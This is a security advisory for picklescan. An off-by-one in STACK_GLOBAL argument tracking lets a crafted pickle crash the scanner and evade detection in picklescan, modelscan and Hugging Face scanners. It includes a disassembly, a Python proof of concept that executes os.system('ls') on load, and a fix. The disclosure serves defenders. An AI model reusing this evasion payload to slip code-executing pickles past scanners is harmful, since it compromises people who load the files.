PT-2025-34324 · Pypi · Picklescan

Published

2025-08-12

·

Updated

2025-08-12

CVSS v4.0

8.9

High

Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Details

There is a parsing logic error in picklescan and modelscan when handling the STACK_GLOBAL opcode. When the `list_globals` function processes a STACK_GLOBAL at position n, it is expected to track the two preceding string arguments, but it scans the wrong range: the loop only considers opcodes at positions n-1 down to 1 and never looks at position 0. The correct range is 0 to n-1. An attacker can place an argument at position 0, so the parser tracks only one argument, and the exception at https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 is raised. This causes a detection bypass, because the malicious pickle file makes the scanner fail with an unexpected exception instead of reporting the global.
Example (pickletools disassembly of the PoC payload):

```text
    0: S    STRING     'os'       --> arg 0: STRING (untracked argument due to wrong scanning range)
    6: S    STRING     'system'   --> arg 1: STRING (tracked argument)
   16: \x93 STACK_GLOBAL
   17: S    STRING     'ls'
   23: \x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
```

PoC

```python
import pickle

# Protocol-0 STRING opcodes for 'os' and 'system', then STACK_GLOBAL (\x93),
# the argument 'ls', TUPLE1 (\x85), REDUCE and STOP.
payload = b"S'os'\nS'system'\n\x93S'ls'\n\x85R."
with open('bad pickle.pkl', 'wb') as f:
    f.write(payload)
with open('bad pickle.pkl', 'rb') as f:
    pickle.load(f)
```

Impact

Detection bypass in both picklescan and modelscan. It also affects the online Hugging Face pickle scanners, so the malicious pickle file evades detection there as well.

Fix

To fix the range, change `range(1, n)` to `range(1, n+1)` so that `n-offset` stays within the range 0 to n and the scan also reaches position 0. https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L255

Remediation

Weakness Enumeration

Deserialization of Untrusted Data

Related identifiers

GHSA-9GVJ-PP9X-GCFR

Affected products

Picklescan